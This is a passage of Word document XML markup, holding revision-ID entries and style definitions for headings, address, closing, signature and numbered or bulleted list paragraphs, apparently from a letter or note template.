    <w:rsid w:val="00F4093F"/>
    <w:rsid w:val="00F41AF2"/>
    <w:rsid w:val="00F42271"/>
    <w:rsid w:val="00F434B3"/>
    <w:rsid w:val="00F46E5D"/>
    <w:rsid w:val="00F47350"/>
    <w:rsid w:val="00F47812"/>
    <w:rsid w:val="00F50247"/>
    <w:rsid w:val="00F5296D"/>
    <w:rsid w:val="00F533A7"/>
    <w:rsid w:val="00F53DA0"/>
    <w:rsid w:val="00F54F3A"/>
    <w:rsid w:val="00F61DEF"/>
    <w:rsid w:val="00F62DB6"/>
    <w:rsid w:val="00F659E7"/>
    <w:rsid w:val="00F661FE"/>
    <w:rsid w:val="00F66EFA"/>
    <w:rsid w:val="00F670E1"/>
    <w:rsid w:val="00F72001"/>
    <w:rsid w:val="00F817E6"/>
    <w:rsid w:val="00F8258A"/>
    <w:rsid w:val="00F82B6F"/>
    <w:rsid w:val="00F86A7F"/>
    <w:rsid w:val="00F86C1B"/>
    <w:rsid w:val="00F877A7"/>
    <w:rsid w:val="00F8781C"/>
    <w:rsid w:val="00F92807"/>
    <w:rsid w:val="00F92F72"/>
    <w:rsid w:val="00F93E75"/>
    <w:rsid w:val="00F959A7"/>
    <w:rsid w:val="00F95A82"/>
    <w:rsid w:val="00F974FA"/>
    <w:rsid w:val="00FA05B4"/>
    <w:rsid w:val="00FA2AA9"/>
    <w:rsid w:val="00FA5B52"/>
    <w:rsid w:val="00FA78B7"/>
    <w:rsid w:val="00FB2591"/>
    <w:rsid w:val="00FB297A"/>
    <w:rsid w:val="00FB2A22"/>
    <w:rsid w:val="00FB3693"/>
    <w:rsid w:val="00FB51BC"/>
    <w:rsid w:val="00FB5558"/>
    <w:rsid w:val="00FB7748"/>
    <w:rsid w:val="00FC02F3"/>
    <w:rsid w:val="00FC11D2"/>
    <w:rsid w:val="00FC11F1"/>
    <w:rsid w:val="00FC1D07"/>
    <w:rsid w:val="00FC3A51"/>
    <w:rsid w:val="00FC7D9E"/>
    <w:rsid w:val="00FD2C32"/>
    <w:rsid w:val="00FD450B"/>
    <w:rsid w:val="00FD4EE0"/>
    <w:rsid w:val="00FD707A"/>
    <w:rsid w:val="00FD7522"/>
    <w:rsid w:val="00FE3697"/>
    <w:rsid w:val="00FE3E79"/>
    <w:rsid w:val="00FE5357"/>
    <w:rsid w:val="00FE6DAE"/>
    <w:rsid w:val="00FF1AD5"/>
    <w:rsid w:val="00FF2003"/>
    <w:rsid w:val="00FF33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A23D9"/>
  <w15:docId w15:val="{2E475FA7-A29F-49E1-BD99-9931C24F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GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
    <w:lsdException w:name="Normal" w:uiPriority="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 1" w:qFormat="1"/>
    <w:lsdException w:name="heading 2" w:qFormat="1"/>
    <w:lsdException w:name="heading 3" w:qFormat="1"/>
    <w:lsdException w:name="heading 4"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lsdException w:name="toc 6" w:semiHidden="1"/>
    <w:lsdException w:name="toc 7" w:semiHidden="1"/>
    <w:lsdException w:name="toc 8" w:semiHidden="1"/>
    <w:lsdException w:name="toc 9" w:semiHidden="1"/>
    <w:lsdException w:name="Normal Indent" w:semiHidden="1"/>
    <w:lsdException w:name="footnote text" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="annotation text" w:semiHidden="1"/>
    <w:lsdException w:name="index heading" w:semiHidden="1"/>
    <w:lsdException w:name="caption" w:qFormat="1"/>
    <w:lsdException w:name="table of figures" w:semiHidden="1" w:uiPriority="99"/>
    <w:lsdException w:name="envelope address" w:semiHidden="1"/>
    <w:lsdException w:name="envelope return" w:semiHidden="1"/>
    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:uiPriority="99"/>
    <w:lsdException w:name="annotation reference" w:semiHidden="1"/>
    <w:lsdException w:name="line number" w:semiHidden="1"/>
    <w:lsdException w:name="page number" w:semiHidden="1"/>
    <w:lsdException w:name="endnote reference" w:semiHidden="1"/>
    <w:lsdException w:name="endnote text" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="table of authorities" w:semiHidden="1"/>
    <w:lsdException w:name="macro" w:semiHidden="1"/>
    <w:lsdException w:name="toa heading" w:semiHidden="1"/>
    <w:lsdException w:name="List"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lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:uiPriority="99"/>
    <w:lsdException w:name="Strong" w:semiHidden="1" w:uiPriority="22" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:semiHidden="1"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qFormat="1"/>
    <w:lsdException w:name="Quote" w:semiHidden="1" w:qFormat="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qFormat="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qFormat="1"/>
    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>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8D63B1"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-IE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="420"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="360"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="360"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="21"/>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croTextChar">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text1">
    <w:name w:val="Text 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Text1Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text2">
    <w:name w:val="Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Text2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text3">
    <w:name w:val="Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Text3Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text4">
    <w:name w:val="Text 4"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Address">
    <w:name w:val="Address"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AddressTL">
    <w:name w:val="AddressTL"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="720"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AddressTR">
    <w:name w:val="AddressTR"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="720"/>
      <w:ind w:left="5103"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalLeftCol">
    <w:name w:val="Normal LeftCol"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>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lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Closing">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Signature"/>
    <w:link w:val="ClosingChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:spacing w:before="240"/>
      <w:ind w:left="5103"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ClosingChar">
    <w:name w:val="Closing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Closing"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Signature">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Contact"/>
    <w:link w:val="SignatureChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:spacing w:before="1200" w:after="0"/>
      <w:ind w:left="5103"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SignatureChar">
    <w:name w:val="Signature Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Signature"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Enclosures">
    <w:name w:val="Enclosures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Participants"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="5642"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0"/>
      <w:ind w:left="1792" w:hanging="1792"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Participants">
    <w:name w:val="Participants"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Copies"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2512"/>
        <w:tab w:val="left" w:pos="2762"/>
        <w:tab w:val="left" w:pos="5642"/>
        <w:tab w:val="left" w:pos="6362"/>
        <w:tab w:val="left" w:pos="6720"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0"/>
      <w:ind w:left="1792" w:hanging="1792"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Copies">
    <w:name w:val="Copies"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2512"/>
        <w:tab w:val="left" w:pos="2762"/>
        <w:tab w:val="left" w:pos="5642"/>
        <w:tab w:val="left" w:pos="6362"/>
        <w:tab w:val="left" w:pos="6720"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0"/>
      <w:ind w:left="1792" w:hanging="1792"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DoubSign">
    <w:name w:val="DoubSign"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Contact"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:spacing w:before="1200" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="22"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet3">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="Text3"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="283"/>
        <w:tab w:val="num" w:pos="2268"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet4">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="Text4"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="283"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue2">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="851"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue3">
    <w:name w:val="List Continue 3"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1134"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue4">
    <w:name w:val="List Continue 4"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1418"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue5">
    <w:name w:val="List Continue 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1701"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber3">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="Text3"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber4">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="Text4"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NoteHead">
    <w:name w:val="NoteHead"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Subject"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="720" w:after="720"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Subject">
    <w:name w:val="Subject"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="480"/>
      <w:ind w:left="1531" w:hanging="1531"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NoteList">
    <w:name w:val="NoteList"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Subject"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5823"/>
      </w:tabs>
      <w:spacing w:before="720" w:after="720"/>
      <w:ind w:left="5104" w:hanging="3119"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="PlainText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofAuthorities">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="482" w:hanging="482"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOAHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="YReferences">
    <w:name w:val="YReferences"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="480"/>
      <w:ind w:left="1531" w:hanging="1531"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet1">
    <w:name w:val="List Bullet 1"/>
    <w:basedOn w:val="Text1"/>
    <w:link w:val="ListBullet1Char"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDash1">
    <w:name w:val="List Dash 1"/>
    <w:basedOn w:val="Text1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDash2">
    <w:name w:val="List Dash 2"/>
    <w:basedOn w:val="Text2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="283"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDash3">
    <w:name w:val="List Dash 3"/>
    <w:basedOn w:val="Text3"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDash4">
    <w:name w:val="List Dash 4"/>
    <w:basedOn w:val="Text4"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="283"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber1">
    <w:name w:val="List Number 1"/>
    <w:basedOn w:val="Text1"/>
    <w:link w:val="ListNumber1Char"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber1Level2">
    <w:name w:val="List Number 1 (Level 2)"/>
    <w:basedOn w:val="Text1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="907"/>
        <w:tab w:val="num" w:pos="567"/>
      </w:tabs>
      <w:ind w:left="567" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber1Level3">
    <w:name w:val="List Number 1 (Level 3)"/>
    <w:basedOn w:val="Text1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1361"/>
        <w:tab w:val="num" w:pos="850"/>
      </w:tabs>
      <w:ind w:left="850" w:hanging="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber1Level4">
    <w:name w:val="List Number 1 (Level 4)"/>
    <w:basedOn w:val="Text1"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1814"/>
        <w:tab w:val="num" w:pos="1134"/>
      </w:tabs>
      <w:ind w:left="1134" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber2Level2">
    <w:name w:val="List Number 2 (Level 2)"/>
    <w:basedOn w:val="Text2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber2Level3">
    <w:name w:val="List Number 2 (Level 3)"/>
    <w:basedOn w:val="Text2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber2Level4">
    <w:name w:val="List Number 2 (Level 4)"/>
    <w:basedOn w:val="Text2"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber3Level2">
    <w:name w:val="List Number 3 (Level 2)"/>
    <w:basedOn w:val="Text3"/>
